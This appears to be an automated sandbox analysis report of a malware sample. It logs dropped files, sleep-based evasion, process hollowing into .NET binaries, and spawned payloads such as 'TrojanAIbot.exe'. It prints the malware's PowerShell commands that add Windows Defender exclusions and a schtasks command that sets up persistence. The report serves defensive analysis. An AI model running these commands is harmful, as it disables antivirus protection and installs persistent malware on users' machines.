Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-25647

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_12-5659

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 6112	Thread sleep time: -330000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99408s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98496s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98384s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97231s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97009s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96404s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95858s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95638s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99474s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99171s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -99061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98946s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98269s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -98016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -97101s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96505s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96163s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -96041s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7532	Thread sleep time: -95813s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep count: 7711 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 1578 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7696	Thread sleep time: -420660000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7696	Thread sleep time: -166680000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7632	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Code function: 0_2_00007FF6C7501460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF6C7501460

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99672
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99408
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99281
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99156
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99043
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98936
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98496
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98384
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97719
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97546
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97231
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97125
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97009
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96891
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96766
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96513
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96404
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96296
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96187
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96075
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95858
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95638
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99474
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99344
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99171
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99061
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98946
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98719
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98609
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98500
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98391
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98269
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98141
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98016
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97797
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97688
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97563
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97438
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97328
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97219
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97101
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96505
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96316
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96163
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96041
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95922
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: alg.exe, 00000007.00000003.1972176897.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1964656991.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1950976025.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2140490460.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2417407058.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2302197410.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1999497913.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2308483180.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2014386335.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AppVClient.exe, 0000000C.00000002.1897525990.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1892431333.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1894711874.00000000004B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3150698705.000000000148D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Code function: 5_2_03191361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_03191361

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0050B794 mov eax, dword ptr fs:[00000030h]	5_2_0050B794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03151130 mov eax, dword ptr fs:[00000030h]	5_2_03151130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03193F3D mov eax, dword ptr fs:[00000030h]	5_2_03193F3D

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C755B64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6C755B64C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0040160F SetUnhandledExceptionFilter,	5_2_0040160F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0040160F SetUnhandledExceptionFilter,	5_2_0040160F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03191361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_03191361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03194C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_03194C7B

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000			Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base address: 400000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 4C4000	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 4C5000	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 11FF008	Jump to behavior

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f
